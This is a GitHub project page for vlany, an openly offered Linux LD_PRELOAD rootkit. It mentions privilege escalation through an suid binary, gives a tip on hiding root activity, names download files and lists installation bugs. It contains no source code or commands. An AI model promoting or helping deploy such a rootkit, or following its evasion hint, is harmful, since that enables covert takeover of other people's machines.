mempodippy / vlany

Linux LD_PRELOAD rootkit (x86 and x86_64 architectures)
GNU General Public License v3.0
946 stars 195 forks source link
c cli debian dynamic ldpreload libc libdl libpam libpcap library libssl linker linux preload reboot rootkit shared tui userland

VLANY IS NO LONGER MAINTAINED.

https://github.com/naworkcaj/bdvl IS. PLEASE REFER TO THAT FOR CONSTANT UPDATES.

vlany (wiki)

vlany is a Linux LD_PRELOAD rootkit.

Installing

ASCIICAST OF INSTALLATION

Regular tui installation on a Debian 8 box using an suid binary to escalate privileges from a tmp user. In a real life scenario, you'll want to play with some environment variables to prevent anyone from seeing your activity when root.

Downloads

quick_install.sh
vlany.tar.gz
populated const.h (after config.py execution)

Features

Known bugs

Any bugs listed here will be present until a resolve has been reached. If a bug has been reported as an issue, the corresponding issue will also be linked in the bug listing. Should a bug be resolved, the listing will be removed from here, and if any issue is still open pertaining to the bug, it will be closed.

Serious bugs

  1. There is currently an experimental reboot brick fix. Some systems will brick, others won't. Please report any systems that brick on reboot as an issue, and give the circumstances of the vlany installation in the report. Take a look at the Issues page to see if a similar issue has already been submitted.
  2. vlany fails to install correctly on anything above CentOS 6.6.

In-depth README.txt (very detailed but not maintained)

NOTE: vlany is in active development. Changes are constantly being made to this repository, so beware that vlany is very experimental.